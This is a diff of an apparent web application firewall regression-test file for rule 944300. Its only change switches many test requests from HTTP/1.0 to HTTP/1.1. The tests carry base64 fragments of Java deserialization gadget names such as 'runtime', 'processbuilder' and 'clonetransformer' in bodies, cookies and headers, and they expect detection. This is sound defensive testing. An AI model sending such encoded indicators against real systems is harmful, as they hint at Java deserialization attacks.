             test: cnVudGltZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -118,7 +118,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"cnVudGltZQ\">element_value</element></xml>"
         output:
           log:
@@ -138,7 +138,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">cnVudGltZQ</element></xml>"
         output:
           log:
@@ -158,7 +158,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">cnVudGltZQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -178,7 +178,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cnVudGltZQ"
         output:
           log:
@@ -198,7 +198,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"cnVudGltZQ\"}"
         output:
           log:
@@ -218,7 +218,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"cnVudGltZQ\": \"test\"}"
         output:
           log:
@@ -238,7 +238,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HJ1bnRpbWU"
         output:
           log:
@@ -258,7 +258,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "HJ1bnRpbWU=test"
         output:
           log:
@@ -279,7 +279,7 @@ tests:
             Cookie: test=HJ1bnRpbWU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -299,7 +299,7 @@ tests:
             Cookie: HJ1bnRpbWU=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -319,7 +319,7 @@ tests:
             test: HJ1bnRpbWU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -338,7 +338,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"HJ1bnRpbWU\">element_value</element></xml>"
         output:
           log:
@@ -358,7 +358,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HJ1bnRpbWU</element></xml>"
         output:
           log:
@@ -378,7 +378,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HJ1bnRpbWU</element></l3></l2></l1></xml>"
         output:
           log:
@@ -398,7 +398,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HJ1bnRpbWU"
         output:
           log:
@@ -418,7 +418,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"HJ1bnRpbWU\"}"
         output:
           log:
@@ -438,7 +438,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"HJ1bnRpbWU\": \"test\"}"
         output:
           log:
@@ -458,7 +458,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BydW50aW1l"
         output:
           log:
@@ -478,7 +478,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "BydW50aW1l=test"
         output:
           log:
@@ -499,7 +499,7 @@ tests:
             Cookie: test=BydW50aW1l
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -519,7 +519,7 @@ tests:
             Cookie: BydW50aW1l=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -539,7 +539,7 @@ tests:
             test: BydW50aW1l
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -558,7 +558,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"BydW50aW1l\">element_value</element></xml>"
         output:
           log:
@@ -578,7 +578,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">BydW50aW1l</element></xml>"
         output:
           log:
@@ -598,7 +598,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BydW50aW1l</element></l3></l2></l1></xml>"
         output:
           log:
@@ -618,7 +618,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BydW50aW1l"
         output:
           log:
@@ -638,7 +638,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"BydW50aW1l\"}"
         output:
           log:
@@ -658,7 +658,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"BydW50aW1l\": \"test\"}"
         output:
           log:
@@ -678,7 +678,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvY2Vzc2J1aWxkZXI"
         output:
           log:
@@ -698,7 +698,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "cHJvY2Vzc2J1aWxkZXI=test"
         output:
           log:
@@ -719,7 +719,7 @@ tests:
             Cookie: test=cHJvY2Vzc2J1aWxkZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -739,7 +739,7 @@ tests:
             Cookie: cHJvY2Vzc2J1aWxkZXI=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -759,7 +759,7 @@ tests:
             test: cHJvY2Vzc2J1aWxkZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -778,7 +778,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"cHJvY2Vzc2J1aWxkZXI\">element_value</element></xml>"
         output:
           log:
@@ -798,7 +798,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">cHJvY2Vzc2J1aWxkZXI</element></xml>"
         output:
           log:
@@ -818,7 +818,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">cHJvY2Vzc2J1aWxkZXI</element></l3></l2></l1></xml>"
         output:
           log:
@@ -838,7 +838,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=cHJvY2Vzc2J1aWxkZXI"
         output:
           log:
@@ -858,7 +858,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}"
         output:
           log:
@@ -878,7 +878,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}"
         output:
           log:
@@ -898,7 +898,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb2Nlc3NidWlsZGVy"
         output:
           log:
@@ -918,7 +918,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "HByb2Nlc3NidWlsZGVy=test"
         output:
           log:
@@ -939,7 +939,7 @@ tests:
             Cookie: test=HByb2Nlc3NidWlsZGVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -959,7 +959,7 @@ tests:
             Cookie: HByb2Nlc3NidWlsZGVy=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -979,7 +979,7 @@ tests:
             test: HByb2Nlc3NidWlsZGVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -998,7 +998,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"HByb2Nlc3NidWlsZGVy\">element_value</element></xml>"
         output:
           log:
@@ -1018,7 +1018,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">HByb2Nlc3NidWlsZGVy</element></xml>"
         output:
           log:
@@ -1038,7 +1038,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">HByb2Nlc3NidWlsZGVy</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1058,7 +1058,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=HByb2Nlc3NidWlsZGVy"
         output:
           log:
@@ -1078,7 +1078,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}"
         output:
           log:
@@ -1098,7 +1098,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}"
         output:
           log:
@@ -1118,7 +1118,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm9jZXNzYnVpbGRlcg"
         output:
           log:
@@ -1138,7 +1138,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Bwcm9jZXNzYnVpbGRlcg=test"
         output:
           log:
@@ -1159,7 +1159,7 @@ tests:
             Cookie: test=Bwcm9jZXNzYnVpbGRlcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1179,7 +1179,7 @@ tests:
             Cookie: Bwcm9jZXNzYnVpbGRlcg=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1199,7 +1199,7 @@ tests:
             test: Bwcm9jZXNzYnVpbGRlcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1218,7 +1218,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Bwcm9jZXNzYnVpbGRlcg\">element_value</element></xml>"
         output:
           log:
@@ -1238,7 +1238,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Bwcm9jZXNzYnVpbGRlcg</element></xml>"
         output:
           log:
@@ -1258,7 +1258,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Bwcm9jZXNzYnVpbGRlcg</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1278,7 +1278,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Bwcm9jZXNzYnVpbGRlcg"
         output:
           log:
@@ -1298,7 +1298,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}"
         output:
           log:
@@ -1318,7 +1318,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}"
         output:
           log:
@@ -1338,7 +1338,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Y2xvbmV0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -1358,7 +1358,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Y2xvbmV0cmFuc2Zvcm1lcg=test"
         output:
           log:
@@ -1379,7 +1379,7 @@ tests:
             Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1399,7 +1399,7 @@ tests:
             Cookie: Y2xvbmV0cmFuc2Zvcm1lcg=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1419,7 +1419,7 @@ tests:
             test: Y2xvbmV0cmFuc2Zvcm1lcg
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1438,7 +1438,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Y2xvbmV0cmFuc2Zvcm1lcg\">element_value</element></xml>"
         output:
           log:
@@ -1458,7 +1458,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Y2xvbmV0cmFuc2Zvcm1lcg</element></xml>"
         output:
           log:
@@ -1478,7 +1478,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Y2xvbmV0cmFuc2Zvcm1lcg</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1498,7 +1498,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Y2xvbmV0cmFuc2Zvcm1lcg"
         output:
           log:
@@ -1518,7 +1518,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}"
         output:
           log:
@@ -1538,7 +1538,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Y2xvbmV0cmFuc2Zvcm1lcg\": \"test\"}"
         output:
           log:
@@ -1558,7 +1558,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=GNsb25ldHJhbnNmb3JtZXI"
         output:
           log:
@@ -1578,7 +1578,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "GNsb25ldHJhbnNmb3JtZXI=test"
         output:
           log:
@@ -1599,7 +1599,7 @@ tests:
             Cookie: test=GNsb25ldHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1619,7 +1619,7 @@ tests:
             Cookie: GNsb25ldHJhbnNmb3JtZXI=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1639,7 +1639,7 @@ tests:
             test: GNsb25ldHJhbnNmb3JtZXI
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1658,7 +1658,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"GNsb25ldHJhbnNmb3JtZXI\">element_value</element></xml>"
         output:
           log:
@@ -1678,7 +1678,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">GNsb25ldHJhbnNmb3JtZXI</element></xml>"
         output:
           log:
@@ -1698,7 +1698,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">GNsb25ldHJhbnNmb3JtZXI</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1718,7 +1718,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=GNsb25ldHJhbnNmb3JtZXI"
         output:
           log:
@@ -1738,7 +1738,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"GNsb25ldHJhbnNmb3JtZXI\"}"
         output:
           log:
@@ -1758,7 +1758,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"GNsb25ldHJhbnNmb3JtZXI\": \"test\"}"
         output:
           log:
@@ -1778,7 +1778,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BjbG9uZXRyYW5zZm9ybWVy"
         output:
           log:
@@ -1798,7 +1798,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "BjbG9uZXRyYW5zZm9ybWVy=test"
         output:
           log:
@@ -1819,7 +1819,7 @@ tests:
             Cookie: test=BjbG9uZXRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1839,7 +1839,7 @@ tests:
             Cookie: BjbG9uZXRyYW5zZm9ybWVy=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1859,7 +1859,7 @@ tests:
             test: BjbG9uZXRyYW5zZm9ybWVy
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -1878,7 +1878,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"BjbG9uZXRyYW5zZm9ybWVy\">element_value</element></xml>"
         output:
           log:
@@ -1898,7 +1898,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">BjbG9uZXRyYW5zZm9ybWVy</element></xml>"
         output:
           log:
@@ -1918,7 +1918,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">BjbG9uZXRyYW5zZm9ybWVy</element></l3></l2></l1></xml>"
         output:
           log:
@@ -1938,7 +1938,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=BjbG9uZXRyYW5zZm9ybWVy"
         output:
           log:
@@ -1958,7 +1958,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"BjbG9uZXRyYW5zZm9ybWVy\"}"
         output:
           log:
@@ -1978,7 +1978,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"BjbG9uZXRyYW5zZm9ybWVy\": \"test\"}"
         output:
           log:
@@ -1998,7 +1998,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Zm9yY2xvc3VyZQ"
         output:
           log:
@@ -2018,7 +2018,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "Zm9yY2xvc3VyZQ=test"
         output:
           log:
@@ -2039,7 +2039,7 @@ tests:
             Cookie: test=Zm9yY2xvc3VyZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2059,7 +2059,7 @@ tests:
             Cookie: Zm9yY2xvc3VyZQ=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2079,7 +2079,7 @@ tests:
             test: Zm9yY2xvc3VyZQ
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2098,7 +2098,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"Zm9yY2xvc3VyZQ\">element_value</element></xml>"
         output:
           log:
@@ -2118,7 +2118,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">Zm9yY2xvc3VyZQ</element></xml>"
         output:
           log:
@@ -2138,7 +2138,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">Zm9yY2xvc3VyZQ</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2158,7 +2158,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=Zm9yY2xvc3VyZQ"
         output:
           log:
@@ -2178,7 +2178,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"test\": \"Zm9yY2xvc3VyZQ\"}"
         output:
           log:
@@ -2198,7 +2198,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "{\"Zm9yY2xvc3VyZQ\": \"test\"}"
         output:
           log:
@@ -2218,7 +2218,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=GZvcmNsb3N1cmU"
         output:
           log:
@@ -2238,7 +2238,7 @@ tests:
             Content-Type: "application/x-www-form-urlencoded"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "GZvcmNsb3N1cmU=test"
         output:
           log:
@@ -2259,7 +2259,7 @@ tests:
             Cookie: test=GZvcmNsb3N1cmU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2279,7 +2279,7 @@ tests:
             Cookie: GZvcmNsb3N1cmU=test
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2299,7 +2299,7 @@ tests:
             test: GZvcmNsb3N1cmU
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
         output:
           log:
             expect_ids: [944300]
@@ -2318,7 +2318,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"GZvcmNsb3N1cmU\">element_value</element></xml>"
         output:
           log:
@@ -2338,7 +2338,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><element attribute_name=\"attribute_value\">GZvcmNsb3N1cmU</element></xml>"
         output:
           log:
@@ -2358,7 +2358,7 @@ tests:
             Content-Type: "application/xml"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "<?xml version=\"1.0\"?><xml><l1><l2><l3><element attribute_name=\"attribute_value\">GZvcmNsb3N1cmU</element></l3></l2></l1></xml>"
         output:
           log:
@@ -2378,7 +2378,7 @@ tests:
             Content-Type: "text/plain"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
           data: "test=GZvcmNsb3N1cmU"
         output:
           log:
@@ -2398,7 +2398,7 @@ tests:
             Content-Type: "application/json"
           method: "POST"
           uri: "/post"
-          version: "HTTP/1.0"
+          version: "HTTP/1.1"
